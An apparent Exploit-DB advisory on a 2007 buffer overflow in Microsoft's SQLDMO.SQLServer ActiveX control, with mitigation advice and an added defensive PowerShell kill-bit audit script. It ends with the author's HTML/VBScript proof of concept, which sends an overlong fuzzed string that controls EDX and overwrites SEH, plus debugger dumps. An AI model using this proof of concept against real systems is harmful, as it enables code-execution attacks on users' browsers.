Vendor: SQL Server Distributed Management Objects
Author: rgod
CVSS: 7.5 (HIGH)
Vulnerability Type: Buffer Overflow
CWE: 119
Product Name: SQL Server Distributed Management Objects
Affected Version From: 08.05.2004
Affected Version To: 08.05.2004
Patch Exists: NO
Related CWE: Unknown
CPE: microsoft:sql_server_distributed_management_objects
Metasploit:
Other Scripts:
Platforms Tested:
2007

Microsoft SQL Server Distributed Management Objects OLE DLL Remote Buffer Overflow

The proof of concept passes fuzzed string arguments to the Start method of the SQL Server Distributed Management Objects OLE DLL (sqldmo.dll) through the SQLDMO.SQLServer ActiveX control. A string controlled by the caller ends up in EDX and is dereferenced as an object pointer before an indirect CALL, which is the first exploitable condition; a longer input also overwrites the Structured Exception Handler (SEH) record, giving a second way to control program flow. Because the control is not marked safe for scripting or initialization, the PoC only loads in Internet Explorer when the Internet zone option for ActiveX controls "not marked as safe" has been changed from its default to "prompt" or "enabled".

Mitigation:

Apply the necessary patches and updates provided by Microsoft. Avoid executing untrusted code or opening untrusted files. The author's object safety report shows the control is not marked safe for scripting or initialization, so leaving the Internet zone setting for "not marked as safe" controls at its default (disabled) prevents untrusted pages from instantiating it.
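The following PowerShell audit is an added example, not part of the Exploit-DB entry or the author's PoC. It checks, on a Windows host, whether the SQLDMO.SQLServer control from the PoC is registered and at which file version, whether Internet Explorer's kill bit (Compatibility Flags 0x400) is set for its CLSID, and what the Internet zone's "not marked as safe" policy (setting 1201) is; with -SetKillBit it writes the kill bit. It assumes the 32-bit registry view and the CLSID shown in the PoC below.

```powershell
# Added audit example (not part of the Exploit-DB entry or the PoC).
# Checks whether the SQLDMO.SQLServer control can still be loaded by
# Internet-zone script: registration/file version, kill bit, and the
# zone's "not marked as safe" policy. Run as Administrator to use
# -SetKillBit. On 64-bit Windows check the same keys under
# SOFTWARE\WOW6432Node as well (assumption: 32-bit control).
param([switch]$SetKillBit)

$Clsid     = '{10020200-E260-11CF-AE68-00AA004A34D5}'   # CLSID from the PoC
$KillBit   = 0x400    # Compatibility Flags bit that stops IE loading the control
$CompatKey = "HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid"
$ClassKey  = "HKLM:\SOFTWARE\Classes\CLSID\$Clsid\InprocServer32"
# Zone 3 = Internet; 1201 = "Initialize and script ActiveX controls not marked as safe"
$ZoneKey   = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3'

function Test-KillBit {
    $flags = (Get-ItemProperty -Path $CompatKey -Name 'Compatibility Flags' `
              -ErrorAction SilentlyContinue).'Compatibility Flags'
    return ($null -ne $flags) -and (($flags -band $KillBit) -ne 0)
}

function Get-ControlDll {
    # The default value of InprocServer32 is the DLL path; $null if not registered
    $path = (Get-ItemProperty -Path $ClassKey -ErrorAction SilentlyContinue).'(default)'
    if ($path -and (Test-Path $path)) { return Get-Item $path }
    return $null
}

function Get-UnsafeControlPolicy {
    $v = (Get-ItemProperty -Path $ZoneKey -Name '1201' -ErrorAction SilentlyContinue).'1201'
    switch ($v) { 0 { 'Enabled' } 1 { 'Prompt' } 3 { 'Disabled' }
                  default { 'Not set (IE default: Disabled)' } }
}

$dll = Get-ControlDll
if ($dll) {
    "sqldmo control registered: $($dll.FullName) (file version $($dll.VersionInfo.FileVersion))"
} else {
    "control CLSID $Clsid is not registered on this host"
}
"kill bit set:               $(Test-KillBit)"
"Internet zone 1201 policy:  $(Get-UnsafeControlPolicy)"

if ($SetKillBit -and -not (Test-KillBit)) {
    New-Item -Path $CompatKey -Force | Out-Null
    New-ItemProperty -Path $CompatKey -Name 'Compatibility Flags' -PropertyType DWord `
        -Value $KillBit -Force | Out-Null
    "kill bit written for $Clsid (restart Internet Explorer to apply)"
}
```

A reported file version of 2000.085.2004.00 matches the build the author tested; a policy of "Enabled" or "Prompt" is the non-default condition the PoC depends on.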

Exploit-DB raw data:

<!--
18.48 01/09/2007
Microsoft SQL Server Distributed Management Objects OLE DLL for
SQL Enterprise Manager (sqldmo.dll) remote buffer overflow PoC

file version: 2000.085.2004.00
product version: 8.05.2004

passing some fuzzy chars to Start method:

EAX 00000000
ECX 00620062
EDX 00620062
EBX 1C3A3638 SQLDMO.1C3A3638
ESP 0013D87C
EBP 0013DAA8
ESI 03042544
EDI 0013DAA0 ASCII "|T"
EIP 1C1C9800 SQLDMO.1C1C9800

...
1C1C97EA   8D8D E4FDFFFF    LEA ECX,DWORD PTR SS:[EBP-21C]
1C1C97F0   51               PUSH ECX
1C1C97F1   8B95 E0FDFFFF    MOV EDX,DWORD PTR SS:[EBP-220]
1C1C97F7   8B02             MOV EAX,DWORD PTR DS:[EDX]
1C1C97F9   8B8D E0FDFFFF    MOV ECX,DWORD PTR SS:[EBP-220]
1C1C97FF   51               PUSH ECX
1C1C9800   FF90 DC010000    CALL DWORD PTR DS:[EAX+1DC] <--- exception
access violation when reading 000001DC

by manipulating edx you have the first exploitable condition...


also seh is overwritten, then:

EAX 00000000
ECX 00610061
EDX 7C9137D8 ntdll.7C9137D8
EBX 00000000
ESP 0013D4AC
EBP 0013D4CC
ESI 00000000
EDI 00000000
EIP 00610061

object safety report:
RegKey Safe for Script: False
RegKey Safe for Init: False
Implements IObjectSafety: True

means: works according to security settings for the Internet zone
needs ActiveX "not marked as safe" option set to "ask" or "enabled" (not the predefined one)

rgod.
http://retrogod.altervista.org
-->
<html>
<object classid='clsid:10020200-E260-11CF-AE68-00AA004A34D5' id='SQLServer'></object>
<script language='vbscript'>

targetFile = "C:\Programmi\Microsoft SQL Server\80\Tools\Binn\sqldmo.dll"
prototype  = "Sub Start ( ByVal StartMode As Boolean ,  [ ByVal Server As Variant ] ,  [ ByVal Login As Variant ] ,  [ ByVal Password As Variant ] )"
memberName = "Start"
progid     = "SQLDMO.SQLServer"
argCount   = 4

'edx = ecx
edx       ="bb"
seh       ="aa"
StartMode =True
Server    ="http://ZZZZ\YYYY\XXXX\WW?W\VVVV\AAAA\AAA\AAAAA\AAAA\AA@AA\tes\test\test\tes.\ttest\MMMM\LLLL\KKK\JJJJ\IIII\HH.H\GGGGG\FFFF\EEEE\DDD\CCCC\BBBB\AAA\A\\\\\\\\\:#$%AAAA\BBBB\CCCC\DD?D\EEEE\FFFF\GGG\\:#$%\HHHHH\IIII\te@st\tes\test\test\tes.aaaabbbbccccddddeeeeffffgggghhhhiiiiaaaaaaa" + seh + "CCDmmm" + edx + "nnnBBBB\AAAA\ZZZ\Z\\\\\\\\\:#$%YYYY\XXXX\WWWW\VV?V\UUUU\TTTT\SSS\\:#$%\RRRRR\QQQQ\PP@PP\OOO\NNNN\MMMM\LLL.\KKKKK\JJJJ\IIII\HHH\GGGG\FFFF\EE.E\DDDDD\CCCC\BBBB\AAA\AAAA\AAAA\AAA\A\\\\\\\\\:#$%AAAA\AAAA\AAAA\AA?A\wwww\vvvv\uuu\\:#$%\ttttt\ssss\rr@rr\qqq\pppp\oooo\nnn.\mmmmm\llll\kkkk\jjj\iiii\hhhh\gg.g\fffff\eeee\dddd\ccc\bbbb\aaaa\AAA\A\\\\\\\"
Login     ="aaaaaaaa"
Password  ="bbbbbbbb"

SQLServer.Start StartMode ,Server ,Login ,Password

</script>
</html>

# milw0rm.com [2007-09-08]